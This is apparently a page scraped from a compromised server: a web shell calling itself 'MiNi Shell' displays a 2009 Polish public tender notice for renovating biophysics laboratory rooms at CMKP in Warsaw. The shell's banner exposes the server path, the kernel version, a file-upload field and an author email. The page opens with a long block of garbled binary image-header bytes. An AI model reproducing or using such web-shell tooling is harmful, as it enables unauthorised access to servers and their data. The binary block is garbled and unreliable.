JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090429/127636-N-2009.html

<p class="kh_header"><b>Warszawa: Remont i modernizację pomieszczeń laboratoryjnych, biurowych i innych Zakładu Biofizyki CMKP w Warszawie  (nr sprawy ZP-610/09)</b><br>
<b>Numer ogłoszenia: 127636 - 2009; data zamieszczenia: 29.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Medyczne Kształcenia Podyplomowego , ul. Marymoncka 99/103, 01-813 Warszawa, woj. mazowieckie, tel. 022 5693700, faks 022 5693712.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cmkp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i modernizację pomieszczeń laboratoryjnych, biurowych i innych Zakładu Biofizyki CMKP w Warszawie  (nr sprawy ZP-610/09).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest modernizacja i remont pomieszczeń laboratoryjnych, biurowych i innych oraz korytarza na IV p segmentu B  - Zakładu Biofizyki CMKP, w zespole budynków CMKP przy ul. Marymonckiej 99/103 w Warszawie.

Zakres prac objęty zamówieniem:
a)	demontaż i wywóz istniejącego wyposażenia,
b)	remont i modernizacja pomieszczeń laboratoryjnych, biurowych i innych Zakładu Biofizyki, umiejscowionych na IV piętrze segmentu, oznaczonego w dokumentacji projektowej literą B, w zakresie objętym projektem technicznym i umową,
c)	remont i modernizacja korytarza Zakładu Biofizyki na IV piętrze, z zachowaniem istniejących standardów w wyremontowanych korytarzach segmentu,
d)	remont i modernizacja pomieszczeń 411 i 412 przeznaczonych na pracownię cytometrii, umiejscowionych na IV piętrze segmentu oznaczonego w dokumentacji projektowej literą B, w zakresie objętym projektem technicznym i umową.
Zamówienie obejmować będzie następujące branże i czynności:
a) architektoniczną:
-	budowa lub modernizacja i remont ścian wewnętrznych
-	remont stropów w pomieszczeniach
-	wymiana, oznaczonej na dokumentacji projektowej, stolarki wewnętrznej drzwiowej 
-	demontaż istniejących i budowa nowych stropów podwieszanych w korytarzu
-	wymiana drzwi do istniejących szachtów instalacyjnych 
-	wymiana wykładzin podłogowych z wykonaniem podkładów pod wykładziny
-	wymiana wewnętrznych parapetów podokiennych
b) sanitarną:
-	wymiana istniejących stalowych rur instalacyjnych z.w i c.w. wraz z pionami
-	wymiana armatury
-	wymiana kanalizacji sanitarnej wraz z pionami
c) elektryczną:
-	montaż w korytarzach koryt metalowych 
-	wykonanie obwodów oświetleniowych
-	wykonanie obwodów gniazd ogólnego stosowania
-	wykonanie wydzielonych obwodów zasilania komputerów 
-	rozbudowa rozdzielni elektrycznych piętrowych
-	demontaż starych rozdzielni 
-	wymiana opraw oświetleniowych
-	wymiana osprzętu elektrycznego
-	wykonanie instalacji zasilających i sterujących dla wentylacji mechanicznej
-	technologia laboratoriów
d) teletechniczną i telekomunikacyjną
-	wymiana i budowa instalacji telefonicznej 
-	wykonanie orurowania dla instalacji wykrywania i sygnalizacji pożaru
-	wymiana i rozbudowa instalacji logicznej komputerowej na instalacje kat.6 
e) wentylacyjną
-	wymiana i budowa wentylacji mechanicznej.

Szczegółowy opis przedmiotu zamówienia określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót budowlanych stanowiąca załącznik nr 7 do niniejszej SIWZ. 

Jeżeli w opisie przedmiotu zamówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że wskazane patenty, znaki towarowe, pochodzenie określają parametry techniczne, eksploatacyjne, użytkowe, co oznacza, że Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o równoważnych parametrach technicznych, eksploatacyjnych i użytkowych. 

Wymagany okres gwarancji na wykonane roboty (materiały i robociznę) zgodnie ze zobowiązaniem wykonawcy zawartym w ofercie jednak nie krócej niż 3 lata.

Ponadto w ramach niniejszego zamówienia do zadań oraz czynności Wykonawcy należeć będzie w szczególności:
a)	Wykonanie prac określonych w dokumentacji projektowej oraz w specyfikacji technicznej wykonania i odbioru robót budowlanych.
b)	Zabezpieczenie robót pod względem bhp oraz bezpieczeństwa osób trzecich.
c)	Zapewnienie ciągłości pracy w budynku CMKP poprzez wykonywanie robót w taki sposób aby:
- 	parce powodujące nadmierny hałas po godzinach pracy Centrum lub w dni wolne od pracy dla pracowników CMKP,
- 	brak dostawy energii elektrycznej dla budynku występował, co najwyżej w niedziele,  
-	brak ciepłej wody w budynku istniał, co najwyżej przez jeden dzień.
d)	Wbudowywanie materiałów posiadających udokumentowane świadectwa dopuszczenia do stosowania w budownictwie lub certyfikaty. 
e)	Spowodowanie dokonania odbioru wykonanych prac przez odpowiednie instancje w tym dostawcę medium grzewczego i zainstalowanie przez dostawców mediów systemów pomiarowych i sterujących dla dostarczanych przez nich mediów (w tym SPEC, STOEN, MPWiK), jeśli realizacja przedmiotu umowy wymaga demontażu tych systemów.
f)	Wywóz oraz w przypadkach wymaganych przepisami, utylizacja wszystkich zdemontowanych materiałów (z wyjątkiem wskazanych przez Zamawiającego materiałów do przekazania Zamawiającemu).
g)	Wykonywanie przedmiotu umowy z zachowaniem jak największej staranności, zasad rzetelnej wiedzy technicznej, zgodnie z zasadami sztuki budowlanej oraz zachowanie wymagań obowiązujących przepisów technicznych, a w szczególności ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. nr 106 z 2000r., poz. 1126 z późn. zm.) i przepisów wykonawczych wydanych na jej podstawie, rozporządzenia MSWiA z dnia 16.02.2003r. w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów (Dz. U. nr 121 poz. 1138), przepisów wykonawczych wydanych na podstawie art. 23715 kodeksu pracy. 
h)	Wykonywanie obowiązków Gwaranta w okresie uzgodnionym w umowie.
i)	Ponoszenie wobec Zamawiającego pełnej odpowiedzialności za realizację przedmiotu umowy.
j)	Ponoszenie skutków prawnych oraz finansowych za istotne zmiany wprowadzone z własnej inicjatywy w trakcie realizacji inwestycji bez akceptacji Zamawiającego.

Wartość zamówienia ustalona została na podstawie art. 32 ust. 4, na kwotę nie przekraczającą równowartości 5,15 mln euro.
Wartość realizowanej części zamówienia ustalona została na kwotę 497 000,00 PLN..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.31.10.00-1, 45.31.57.00-5, 45.33.12.00-8, 45.33.20.00-3, 45.33.11.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości: 14.000,00 PLN (słownie: czternaście tysięcy złotych) przed upływem terminu składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy: 
a)	spełniają warunki określone w art. 22 ust. 1 pkt 1-3 ustawy
PZP,
b)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy PZP,
c)	posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia przez co należy rozumieć wykonanie (tj. rozpoczęcie i zakończenie) z należytą starannością w okresie ostatnich pięciu lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zamówień odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot niniejszego zamówienia. Za roboty odpowiadające swoją wartością zamawiający uważa roboty budowlane za co najmniej 400.000,00 zł brutto każda (słownie: trzysta tysięcy złotych brutto), za roboty odpowiadające swoim rodzajem zamawiający uważa roboty budowlane polegające na remoncie, modernizacji, budowie lub przebudowie pomieszczeń laboratoryjnych,
d)	dysponują niezbędnym potencjałem technicznym do wykonania zamówienia i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, w szczególności dysponują lub będą dysponować osobami posiadającymi uprawnienia do wykonywania samodzielnych funkcji w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane /Dz. U. 2003, Nr 207, poz. 2016 z późn. zm./, w zakresie:
-	kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, oraz posiadającymi aktualne zaświadczenia o członkostwie we właściwych izbach samorządu zawodowego - minimum 1 osoba,
-	kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji sanitarnych, oraz posiadającymi aktualne zaświadczenia o członkostwie we właściwych izbach samorządu zawodowego - minimum 1 osoba,
-	kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych oraz urządzeń elektroenergetycznych, oraz posiadającymi aktualne zaświadczenia o członkostwie we właściwych izbach samorządu zawodowego - minimum 1 osoba,
e)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej terminowe wykonanie zamówienia, tzn. w ubiegłym roku obrotowym osiągnęli przychód roczny z działalności podstawowej co najmniej 1.000.000,00 PLN (słownie: jeden milion złotych). 

Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w rozdziale 6 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta musi zawierać następujące oświadczenia i dokumenty: 
a)	wypełniony formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1 do SIWZ;
b)	oświadczenie o spełnieniu warunków udziału w postępowaniu określone w art. 22 ust. 1 oraz nie podleganiu wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy PZP z wykorzystaniem wzoru - załącznik nr 2 do SIWZ;
c)	w przypadku, gdy wykonawca przewiduje powierzenie części zamówienia podwykonawcom - wypełniony załącznik nr 3 do SIWZ - Wykaz Podwykonawców.

W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności objętych przedmiotem zamówienia oraz nie podlega wykluczeniu, do oferty należy dołączyć następujące dokumenty:
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeśli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku spółki cywilnej - wszystkich przedsiębiorców będących wspólnikami).

W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę, doświadczenie, dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, a także znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia do oferty należy dołączyć następujące dokumenty: 
a)	wykaz co najmniej 2 zamówień wykonanych (tj. rozpoczętych i zakończonych) z należytą starannością w okresie ostatnich pięciu lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot niniejszego zamówienia; za roboty odpowiadające swoją wartością zamawiający uważa roboty budowlane za co najmniej 300.000,00 zł brutto każda (słownie: trzysta tysięcy złotych brutto), za roboty odpowiadające swoim rodzajem zamawiający uważa roboty budowlane polegające na remoncie, modernizacji, budowie lub przebudowie pomieszczeń laboratoryjnych i biurowych, z podaniem ich wartości oraz daty i miejsca wykonania (wg załącznika nr 4 do SIWZ) oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie;
b)	wykaz osób, o których mowa w rozdziale 5 lit. d SIWZ, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z kserokopiami ich uprawnień do wykonywania samodzielnych funkcji w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity: Dz. U. 2003, Nr 207, poz. 2016 ze zm.) oraz aktualnych zaświadczeń o członkostwie we właściwych izbach samorządu zawodowego;
c)	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, o których mowa w rozdziale 5 lit. d SIWZ, jeżeli w wykazie, o którym mowa powyżej, Wykonawca wskazał osoby, którymi będzie dysponował.
d)	sprawozdanie finansowe, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanym sprawozdaniu albo w przypadku wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty, zysk oraz zobowiązania i należności - za ostatni rok obrotowy;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.cmkp.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Medyczne Kształcenia Podyplomowego, ul. Marymoncka 99/103, 01-813 Warszawa, pokój 27..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2009 godzina 10:00, miejsce: Centrum Medyczne Kształcenia Podyplomowego, ul. Marymoncka 99/103, 01-813 Warszawa, Kancelaria pokój 28-29.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający przewiduje możliwość zmiany zawartej umowy na zasadach opisanych w art. 144 ust. 1 ustawy PZP w następującym zakresie:
a)	Termin realizacji przedmiotu umowy może zostać wydłużony w przypadku wystąpienia w trakcie realizacji umowy konieczności zlecenia robót dodatkowych niezbędnych do jej prawidłowego wykonania, na podstawie art. 67 ust. 1 pkt 5 ustawy PZP, o czas niezbędny na wykonanie robót dodatkowych.

Creat By MiNi SheLL
Email: jattceo@gmail.com